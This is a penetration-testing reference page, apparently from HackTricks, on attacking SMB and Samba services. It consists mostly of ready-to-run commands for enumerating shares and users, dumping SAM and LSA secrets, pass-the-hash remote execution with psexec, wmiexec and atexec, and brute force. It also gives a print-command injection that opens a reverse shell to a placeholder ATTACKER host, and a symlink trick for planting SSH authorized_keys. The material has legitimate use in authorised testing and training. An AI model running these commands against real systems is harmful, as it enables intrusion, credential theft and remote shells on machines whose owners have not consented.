overview.md (35468B)
1 --- 2 title: "139,445 - Pentesting SMB" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-smb/README.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-smb/README.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: true 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 139,445 - Pentesting SMB 14 15 ## Port 139 16 17 NetBIOS provides naming, datagram, and session services to applications. NetBIOS names are 16-byte identifiers (commonly described as 15 visible characters plus a service suffix). SMB can use the NetBIOS Session Service over TCP port **139**, although modern SMB commonly uses direct TCP instead.<sup>[[9]](#references)</sup> 18 19 ```text 20 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 21 ``` 22 23 ## Port 445 24 25 Port 139 carries the NetBIOS Session Service, while TCP port 445 (`microsoft-ds`) carries SMB directly. **SMB** stands for **Server Message Block**. **CIFS** refers to the older SMB1 dialect and should not be used as a synonym for modern SMB2/SMB3. SMB provides shared access to resources such as files, printers, and named pipes.<sup>[[9]](#references)[[10]](#references)</sup> 26 27 When SMB is observed on port 445 it is using direct TCP; on port 139 it is transported through NetBIOS over TCP. SMB2 also supports other transports in newer deployments, including RDMA and QUIC for applicable dialects.<sup>[[9]](#references)</sup> 28 29 ```text 30 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 31 ``` 32 33 ### SMB 34 35 The **Server Message Block (SMB)** protocol uses a client-server model to provide access to files, directories, printers, named pipes, and related network resources. Windows includes SMB client and server components, and the **Samba** project implements SMB for Linux and other Unix-like systems. Compatibility depends on the dialects and security features enabled; current systems may deliberately disable SMB1 and other legacy behavior.<sup>[[10]](#references)</sup> 36 37 An SMB server exports resources as named shares, so the hierarchy visible to a client can differ from the underlying filesystem. Share permissions and filesystem ACLs are separate layers, but a client's **effective** access is constrained by both. Always test the actual operations permitted rather than infer access from a share-listing label alone. 38 39 ### IPC$ Share 40 41 `IPC$` exposes inter-process communication resources such as named pipes. Some servers permit anonymous or guest access through a null session, but current Windows/Samba policies frequently restrict it. When permitted, tools such as `enum4linux` can query: 42 43 - Information on the operating system 44 - Details on the parent domain 45 - A compilation of local users and groups 46 - Information on available SMB shares 47 - The effective system security policy 48 49 The exact results depend on anonymous-access policy and the privileges of supplied credentials. 50 51 ```bash 52 enum4linux -a target_ip 53 ``` 54 55 The above command is an example of how `enum4linux` might be used to perform a full enumeration against a target specified by `target_ip`. 56 57 ## What is NTLM 58 59 For protocol details, attack prerequisites, and defenses, see [NTLM](/hacktricks/windows-hardening/ntlm/overview). 60 61 ## **Server Enumeration** 62 63 ### **Scan** a network searching for hosts: 64 65 ```bash 66 nbtscan -r 192.168.0.1/24 67 ``` 68 69 ### SMB server version 70 71 To evaluate version-specific exposures, determine the server implementation and negotiated SMB dialect. If other tools do not reveal them, you can: 72 73 - Use the **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**` 74 - Or this script: 75 76 ```bash 77 #!/bin/sh 78 #Author: rewardone 79 #Description: 80 # Requires root or enough permissions to use tcpdump 81 # Will listen for the first 7 packets of a null login 82 # and grab the SMB Version 83 #Notes: 84 # Will sometimes not capture or will print multiple 85 # lines. May need to run a second time for success. 86 if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi 87 if [ ! -z $2 ]; then rport=$2; else rport=139; fi 88 tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " & 89 echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null 90 echo "" && sleep .1 91 ``` 92 93 ### **Search exploit** 94 95 ```bash 96 msf> search type:exploit platform:windows target:2008 smb 97 searchsploit microsoft smb 98 ``` 99 100 ### **Possible** Credentials 101 102 | **Username(s)** | **Common passwords** | 103 | -------------------- | ----------------------------------------- | 104 | _(blank)_ | _(blank)_ | 105 | guest | _(blank)_ | 106 | Administrator, admin | _(blank)_, password, administrator, admin | 107 | arcserve | arcserve, backup | 108 | tivoli, tmersrvd | tivoli, tmersrvd, admin | 109 | backupexec, backup | backupexec, backup, arcada | 110 | test, lab, demo | password, test, lab, demo | 111 112 ### Brute Force 113 114 - [**SMB Brute Force**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#smb) 115 116 ### Obtain Information 117 118 ```bash 119 #Dump interesting information 120 enum4linux -a [-u "<username>" -p "<passwd>"] <IP> 121 enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP> 122 nmap --script "safe or smb-enum-*" -p 445 <IP> 123 124 #Connect to the rpc 125 rpcclient -U "" -N <IP> #No creds 126 rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash 127 rpcclient -U "username%passwd" <IP> #With creds 128 #You can use querydispinfo and enumdomusers to query user information 129 130 #Dump user information 131 /usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address> 132 /usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address> 133 134 #Map possible RPC endpoints 135 /usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address> 136 /usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address> 137 /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address> 138 ``` 139 140 ### Enumerate Users, Groups & Logged On Users 141 142 This information may already have been gathered by `enum4linux` or `enum4linux-ng`. 143 144 ```bash 145 crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>] 146 crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>] 147 crackmapexec smb 10.10.10.10 --loggedon-users [-u <username> -p <password>] 148 149 ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " " 150 151 rpcclient -U "" -N 10.10.10.10 152 enumdomusers 153 enumdomgroups 154 ``` 155 156 ### Enumerate local users 157 158 [Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py) 159 160 ```bash 161 lookupsid.py -no-pass hostname.local 162 ``` 163 164 Oneliner 165 166 ```bash 167 for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done 168 ``` 169 170 ### Metasploit - Enumerate local users 171 172 ```bash 173 use auxiliary/scanner/smb/smb_lookupsid 174 set rhosts hostname.local 175 run 176 ``` 177 178 ### Enumerating LSARPC and SAMR with `rpcclient` 179 180 See the dedicated [`rpcclient` enumeration guide](/hacktricks/network-services-pentesting/pentesting-smb/rpcclient-enumeration). 181 182 ### GUI connection from linux 183 184 #### In the terminal: 185 186 `xdg-open smb://cascade.htb/` 187 188 #### In file browser window (nautilus, thunar, etc) 189 190 `smb://friendzone.htb/general/` 191 192 ## Shared Folders Enumeration 193 194 ### List shared folders 195 196 Always check what the server exposes. If the rules of engagement permit it and no credentials are available, test anonymous and guest access. 197 198 ```bash 199 smbclient --no-pass -L //<IP> # Null user 200 smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash 201 202 smbmap -H <IP> [-P <PORT>] #Null user 203 smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds 204 smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash 205 smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list 206 207 crackmapexec smb <IP> -u '' -p '' --shares #Null user 208 crackmapexec smb <IP> -u 'username' -p 'password' --shares # Password authentication 209 crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares # NT-hash authentication 210 ``` 211 212 ### **Connect/List a shared folder** 213 214 ```bash 215 #Connect using smbclient 216 smbclient --no-pass //<IP>/<Folder> 217 smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash 218 #Use --no-pass -c 'recurse;ls' to list recursively with smbclient 219 220 # List with smbmap; without a folder it lists everything 221 smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list 222 smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list 223 smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash 224 ``` 225 226 ### **Manually enumerate windows shares and connect to them** 227 228 Share enumeration may be restricted even when a known share can be reached. It can therefore be useful to try common share names directly. With a valid session, responses such as `NT_STATUS_ACCESS_DENIED` and `NT_STATUS_BAD_NETWORK_NAME` can sometimes distinguish an existing but inaccessible share from a nonexistent one, although servers and security products may normalize errors. 229 230 Common share names on Windows targets include: 231 232 - C$ 233 - D$ 234 - ADMIN$ 235 - IPC$ 236 - PRINT$ 237 - FAX$ 238 - SYSVOL 239 - NETLOGON 240 241 (Common share names from _**Network Security Assessment 3rd edition**_) 242 243 You can try to connect to them by using the following command 244 245 ```bash 246 smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share 247 smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password) 248 ``` 249 250 or this script (using a null session) 251 252 ```bash 253 #/bin/bash 254 255 ip='<TARGET-IP-HERE>' 256 shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON') 257 258 for share in ${shares[*]}; do 259 output=$(smbclient -U '%' -N \\\\$ip\\$share -c '') 260 261 if [[ -z $output ]]; then 262 echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created 263 else 264 echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME) 265 fi 266 done 267 ``` 268 269 examples 270 271 ```bash 272 smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME 273 smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session 274 ``` 275 276 ### **Enumerate shares from Windows / without third-party tools** 277 278 PowerShell 279 280 ```bash 281 # Retrieves the SMB shares on the local computer. 282 Get-SmbShare 283 Get-WmiObject -Class Win32_Share 284 # Retrieves the SMB shares on a remote computer. 285 get-smbshare -CimSession "<computer name or session object>" 286 # Retrieves the connections established from the local SMB client to the SMB servers. 287 Get-SmbConnection 288 ``` 289 290 CMD console 291 292 ```bash 293 # List shares on the local computer 294 net share 295 # List shares on a remote computer (including hidden ones) 296 net view \\<ip> /all 297 ``` 298 299 MMC Snap-in (graphical) 300 301 ```bash 302 # Shared Folders: Shared Folders > Shares 303 fsmgmt.msc 304 # Computer Management: Computer Management > System Tools > Shared Folders > Shares 305 compmgmt.msc 306 ``` 307 308 explorer.exe (graphical), enter `\\<ip>\` to see the available non-hidden shares. 309 310 ### Mount a shared folder 311 312 ```bash 313 mount -t cifs //x.x.x.x/share /mnt/share 314 mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share 315 ``` 316 317 ### **Download files** 318 319 Read previous sections to learn how to connect with credentials/Pass-the-Hash. 320 321 ```bash 322 #Search a file and download 323 sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap 324 ``` 325 326 ```bash 327 #Download all 328 smbclient //<IP>/<share> 329 > mask "" 330 > recurse 331 > prompt 332 > mget * 333 #Download everything to current directory 334 ``` 335 336 Commands: 337 338 - mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files) 339 - recurse: toggles recursion on (default: off) 340 - prompt: toggles prompting for filenames off (default: on) 341 - mget: copies all files matching the mask from host to client machine 342 343 (_Information from the manpage of smbclient_) 344 345 ### Domain Shared Folders Search 346 347 - [**Snaffler**](https://github.com/SnaffCon/Snaffler) 348 349 ```bash 350 Snaffler.exe -s -d domain.local -o snaffler.log -v data 351 ``` 352 353 - [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider. 354 - `-M spider_plus [--share <share_name>]` 355 - `--pattern txt` 356 357 ```bash 358 sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares' 359 ``` 360 361 Files named **`Registry.xml`** are especially interesting because legacy Group Policy Preferences may contain recoverable `cpassword` values. **`web.config`** files may also contain application secrets or connection strings. 362 363 > [!TIP] 364 > The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**. 365 > Check these scripts for sensitive information such as passwords. Do not trust automated share labels alone: the effective share and NTFS ACLs determine whether a write succeeds. If the assessment explicitly permits mutation, test with a uniquely named harmless file and remove it immediately; do not alter an existing logon script. 366 > If writable, you can [poison logon scripts for RCE at user logon](/hacktricks/windows-hardening/active-directory-methodology/acl-persistence-abuse/overview#sysvolnetlogon-logon-script-poisoning). 367 368 ### ShareHound – OpenGraph collector for SMB shares (BloodHound) 369 370 [ShareHound](https://github.com/p0dalirius/sharehound) discovers domain SMB shares, traverses them, extracts ACLs, and emits an OpenGraph JSON file for BloodHound CE/Enterprise.<sup>[[6]](#references)</sup> 371 372 - Baseline collection: 373 1) LDAP: enumerate computer objects, read `dNSHostName` 374 2) DNS: resolve each host 375 3) SMB: list shares on reachable hosts 376 4) Crawl shares (BFS/DFS), enumerate files/folders, capture permissions 377 378 ShareQL-driven traversal 379 - [ShareQL](https://github.com/p0dalirius/shareql) is a first-match-wins DSL to allow/deny traversal by host/share/path and set per-rule max depth. Focus on interesting shares and cap recursion.<sup>[[7]](#references)</sup> 380 381 Example ShareQL rules 382 ```text 383 # Only crawl shares with name containing "backup", up to depth 2 384 allow host * share * path * depth 0 385 allow host * share *backup* path * depth 2 386 deny host * share * path * 387 ``` 388 389 Usage 390 ```bash 391 sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" -ns "10.0.100.201" \ 392 -rf "rules/skip_common_shares.shareql" -rf "rules/max_depth_2.shareql" 393 ``` 394 - Provide AD creds via `-ad`/`-au`/`-ap` (or use `-ad` with `-au`/`-ap`). Use `-r`/`-rf` for inline rules or files. 395 - Output: JSON OpenGraph; import in BloodHound to query hosts/shares/files and effective rights. 396 - Tip: Limit max depth to 1–2 unless your filters are very restrictive. 397 398 BloodHound attack-surface queries 399 - Principals with write-like access on shares 400 ```text 401 MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty|CanDsWriteExtendedProperties]->(s:NetworkShareSMB) 402 RETURN x 403 ``` 404 405 - Principals with FULL_CONTROL on shares 406 <details> 407 <summary>Cypher: principals with FULL_CONTROL on shares</summary> 408 409 ```text 410 MATCH (p:Principal)-[r]->(s:NetworkShareSMB) 411 WHERE (p)-[:CanDelete]->(s) 412 AND (p)-[:CanDsControlAccess]->(s) 413 AND (p)-[:CanDsCreateChild]->(s) 414 AND (p)-[:CanDsDeleteChild]->(s) 415 AND (p)-[:CanDsDeleteTree]->(s) 416 AND (p)-[:CanDsListContents]->(s) 417 AND (p)-[:CanDsListObject]->(s) 418 AND (p)-[:CanDsReadProperty]->(s) 419 AND (p)-[:CanDsWriteExtendedProperties]->(s) 420 AND (p)-[:CanDsWriteProperty]->(s) 421 AND (p)-[:CanReadControl]->(s) 422 AND (p)-[:CanWriteDacl]->(s) 423 AND (p)-[:CanWriteOwner]->(s) 424 RETURN p,r,s 425 ``` 426 427 </details> 428 429 - Hunt sensitive files by extension (e.g., VMDKs) 430 ```text 431 MATCH p=(h:NetworkShareHost)-[:HasNetworkShare]->(s:NetworkShareSMB)-[:Contains*0..]->(f:File) 432 WHERE toLower(f.extension) = toLower(".vmdk") 433 RETURN p 434 ``` 435 436 ## Read Registry 437 438 You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try: 439 440 ```bash 441 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s 442 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s 443 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s 444 ``` 445 446 ## Post Exploitation 447 448 The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**:<sup>[[2]](#references)</sup> 449 450 | **Setting** | **Description** | 451 | --------------------------- | ------------------------------------------------------------------- | 452 | `browseable = yes` | Makes the share visible in browse/share lists. | 453 | `read only = no` | Allows writes when the effective filesystem permissions also permit them. | 454 | `writable = yes` | Synonym for `read only = no`. | 455 | `guest ok = yes` | Allows access without a password, mapped according to the guest-account settings. | 456 | `printable = yes` | Exposes the share as a printer queue rather than a disk share. | 457 | `print command = ... %J %s` | Runs a server-side print command with substituted job metadata and spool path. | 458 | `enable privileges = yes` | Enables the privilege subsystem used for privileges assigned to SIDs. | 459 | `force user = <name>` | Performs file operations as the specified UNIX user after connection setup. | 460 | `wide links = yes` | Permits following symlinks outside the exported tree when related safeguards allow it. | 461 | `allow insecure wide links = yes` | Removes Samba's safety coupling between `wide links` and UNIX extensions. | 462 | `create mask = 0777` | Limits permission bits that clients may set on newly created files. | 463 | `directory mask = 0777` | Limits permission bits that clients may set on newly created directories. | 464 | `logon script = script.sh` | Specifies a client-side logon script path for domain logons. | 465 | `magic script = script.sh` | Names a file whose close event triggers server-side execution. | 466 | `magic output = script.out` | Names the file that receives output from the magic script. | 467 468 The command `smbstatus` gives information about the **server** and about **who is connected**. 469 470 ### Printable shares and shell-based `print command` injection 471 472 A **printer share** may look uninteresting because `ls` fails, but it can still accept jobs via `smbclient`'s `print <filename>` command. Enumerate them with: 473 474 ```bash 475 smbclient -L //<IP>/ -N 476 rpcclient -N -U "" <IP> -c 'enumprinters; netshareenumall' 477 ``` 478 479 If the server-side share uses a shell-based `print command`, treat any `print command` line containing `%J` as high risk. NVD describes CVE-2026-4480 as Samba passing the **client-controlled job description string** into `print command` via `%J` without escaping shell metacharacters, turning the print job name into an OS command injection primitive.<sup>[[1]](#references)[[3]](#references)</sup> 480 481 Typical risky pattern: 482 483 ```ini 484 [printer] 485 path = /var/spool/samba 486 printable = yes 487 guest ok = yes 488 print command = /usr/local/bin/print-helper %J %s 489 ``` 490 491 Quick checks and abuse ideas: 492 493 ```bash 494 # confirm the share is printable even if directory listing fails 495 smbclient //<IP>/PRINTER -N 496 smb: \> print payload 497 498 # search local configs after foothold on the server 499 grep -R "^[[:space:]]*print command\|%J\|printable\|guest ok" /etc/samba 2>/dev/null 500 501 # if %J is injected into a shell command, the job name itself becomes interesting 502 echo 'id' > '|sh' 503 smbclient //<IP>/PRINTER -N -c 'print "|sh"' 504 505 echo 'bash -i >& /dev/tcp/ATTACKER/443 0>&1' > '|bash' 506 smbclient //<IP>/PRINTER -N -c 'print "|bash"' 507 ``` 508 509 The same primitive can also be reached over the `\pipe\spoolss` RPC endpoint: open the printer, set `DocumentInfo1.document_name` to the malicious job name that should land in `%J`, write the body as the spool data, and finish the job to trigger the print command. 510 511 ### `wide links` + `force user` = write outside the share as another UNIX user 512 513 `wide links = yes` lets Samba follow symlinks that point **outside** the exported path. The official Samba docs note that this is normally constrained by UNIX extensions, and that `allow insecure wide links = yes` removes that protection. If the same share also sets `force user = <victim>`, then an authenticated user can make Samba **write as the forced UNIX account**.<sup>[[2]](#references)</sup> 514 515 High-value combination: 516 517 ```ini 518 [transfer] 519 path = /srv/transfer 520 valid users = scott 521 force user = marcus 522 read only = no 523 wide links = yes 524 525 [global] 526 allow insecure wide links = yes 527 unix extensions = no 528 ``` 529 530 Abuse flow: 531 532 ```bash 533 # from a shell on the Samba server 534 ln -s /home/marcus /srv/transfer/marcus 535 536 # traverse the symlink over SMB, not locally 537 smbclient //<IP>/transfer -U scott%PASSWORD 538 smb: \> ls 539 smb: \> cd marcus 540 smb: \marcus\> mkdir .ssh 541 smb: \marcus\> put ~/.ssh/id_ed25519.pub .ssh/authorized_keys 542 ``` 543 544 The important nuance is that local filesystem access may still fail for the attacker, but SMB traversal succeeds because Samba performs the operation as the **forced user**, not as the account that authenticated to the share.<sup>[[1]](#references)</sup> 545 546 ### Loot readable backup configs after Samba footholds 547 548 After landing on a Samba host, look for backup/sync configs such as `rclone.conf`. Rclone documents that config passwords are only **obscured**, not securely protected, so readable config files can expose reusable secrets:<sup>[[1]](#references)[[4]](#references)</sup> 549 550 ```bash 551 find / -name rclone.conf 2>/dev/null 552 rclone reveal <obscured_secret> 553 ``` 554 555 Related Veeam backup-artifact workflow: 556 557 [Pentesting Veeam Backup And Replication](/hacktricks/network-services-pentesting/pentesting-veeam-backup-and-replication) 558 559 ## Authenticate using Kerberos 560 561 You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**: 562 563 ```bash 564 smbclient --kerberos //ws01win10.domain.com/C$ 565 rpcclient -k ws01win10.domain.com 566 ``` 567 568 In Kerberos-only environments (NTLM disabled), NTLM attempts against SMB may return `STATUS_NOT_SUPPORTED`. Fix common Kerberos issues and force Kerberos auth:<sup>[[1]](#references)[[5]](#references)</sup> 569 570 ```bash 571 # sync clock to avoid KRB_AP_ERR_SKEW 572 sudo ntpdate <dc.fqdn> 573 574 # use Kerberos with tooling (reads your TGT from ccache) 575 netexec smb <dc.fqdn> -k 576 ``` 577 578 For a complete client setup (`krb5.conf` generation, `kinit`, and GSSAPI/SPN caveats), see [Pentesting Kerberos](/hacktricks/network-services-pentesting/pentesting-kerberos-88/overview).<sup>[[8]](#references)</sup> 579 580 ## **Execute Commands** 581 582 ### **crackmapexec** 583 584 CrackMapExec can execute commands through methods including **mmcexec, smbexec, atexec, and wmiexec**; supported choices and defaults vary by release. Select a method with `--exec-method`: 585 586 ```bash 587 apt-get install crackmapexec 588 589 crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell 590 crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami # Execute cmd 591 crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash 592 # Using --exec-method {mmcexec,smbexec,atexec,wmiexec} 593 594 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM 595 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa # Dump LSA secrets 596 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions # Get sessions 597 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users 598 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks 599 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users 600 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups 601 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups 602 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy 603 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute 604 605 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash 606 ``` 607 608 ### [**psexec**](/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec) / [**smbexec**](/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec#impacket-smbexecpy-smbexec) 609 610 Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\ 611 See the dedicated [psexec and smbexec page](/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec) for protocol details and additional examples.\ 612 In **kali** it is located on /usr/share/doc/python3-impacket/examples/ 613 614 ```bash 615 #If no password is provided, it will be prompted 616 ./psexec.py [[domain/]username[:password]@]<targetName or address> 617 ./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash 618 psexec \\192.168.122.66 -u Administrator -p 123456Ww 619 psexec \\192.168.122.66 -u Administrator -p '<password>' # Sysinternals PsExec password authentication 620 ``` 621 622 With Impacket, `-k` requests Kerberos authentication instead of NTLM (usually using the current credential cache or supplied credentials). 623 624 ### [wmiexec](/hacktricks/windows-hardening/lateral-movement/wmiexec)/dcomexec 625 626 Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\ 627 In **kali** it is located on /usr/share/doc/python3-impacket/examples/ 628 629 ```bash 630 #If no password is provided, it will be prompted 631 ./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password 632 ./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash 633 #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted 634 ``` 635 636 With Impacket, `-k` requests Kerberos authentication instead of NTLM. 637 638 ```bash 639 #If no password is provided, it will be prompted 640 ./dcomexec.py [[domain/]username[:password]@]<targetName or address> 641 ./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash 642 #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted 643 ``` 644 645 ### [AtExec](/hacktricks/windows-hardening/lateral-movement/atexec) 646 647 Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\ 648 In **kali** it is located on /usr/share/doc/python3-impacket/examples/ 649 650 ```bash 651 ./atexec.py [[domain/]username[:password]@]<targetName or address> "command" 652 ./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami" 653 ``` 654 655 ## Impacket reference 656 657 [https://www.hackingarticles.in/impacket-guide-smb-msrpc/](https://www.hackingarticles.in/impacket-guide-smb-msrpc/) 658 659 ### ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller) 660 661 See [ksmbd attack surface and SMB2/SMB3 protocol fuzzing](/hacktricks/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller). 662 663 ## **Bruteforce users credentials** 664 665 **This is not recommended, you could block an account if you exceed the maximum allowed tries** 666 667 ```bash 668 nmap --script smb-brute -p 445 <IP> 669 ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name 670 ``` 671 672 ## SMB relay attack 673 674 An SMB relay attack captures or coerces an NTLM authentication attempt and forwards it to another service that accepts it. Success depends on protocol protections (especially SMB signing and channel binding), target configuration, account restrictions, and the relayed account's privileges. A successful relay may allow actions such as share access or remote administration, but it does not automatically yield a SYSTEM shell.<sup>[[11]](#references)</sup>\ 675 [**More information about this attack here.**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) 676 677 ## SMB-Trap 678 679 Some Windows applications that use URLMon or related URL handlers may attempt integrated authentication when processing a UNC resource such as `<img src="file://10.10.10.10/path/image.jpg">`. Modern browser zone policy and application-specific restrictions can prevent or prompt for this behavior, so verify it against the exact client in scope. 680 681 This happens with the functions: 682 683 - URLDownloadToFile 684 - URLDownloadToCache 685 - URLOpenStream 686 - URLOpenBlockingStream 687 688 Applications may call functions such as: 689 690  691 692 ### SMBTrap using MitMf 693 694  695 696 ## NTLM Theft 697 698 Similar to SMB trapping, planting crafted shortcut, document, or URL-bearing files on a target system can **elicit** an SMB authentication attempt when a user or vulnerable parser processes them. A tool such as Responder can capture the NTLMv2 challenge-response, which may then be tested offline or relayed when the relevant protections and account restrictions permit it. 699 700 [See: ntlm_theft](/hacktricks/windows-hardening/ntlm/places-to-steal-ntlm-creds#ntlm_theft) 701 702 ## HackTricks Automatic Commands 703 704 ```text 705 Protocol_Name: SMB #Protocol Abbreviation if there is one. 706 Port_Number: 137,138,139 #Comma separated if there is more than one. 707 Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out 708 709 Entry_1: 710 Name: Notes 711 Description: Notes for SMB 712 Note: | 713 While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. 714 715 #These are the commands I run in order every time I see an open SMB port 716 717 With No Creds 718 nbtscan {IP} 719 smbmap -H {IP} 720 smbmap -H {IP} -u null -p null 721 smbmap -H {IP} -u guest 722 smbclient -N -L //{IP} 723 smbclient -N //{IP}/ --option="client min protocol"=LANMAN1 724 rpcclient {IP} 725 rpcclient -U "" {IP} 726 crackmapexec smb {IP} 727 crackmapexec smb {IP} --pass-pol -u "" -p "" 728 crackmapexec smb {IP} --pass-pol -u "guest" -p "" 729 GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all 730 GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat 731 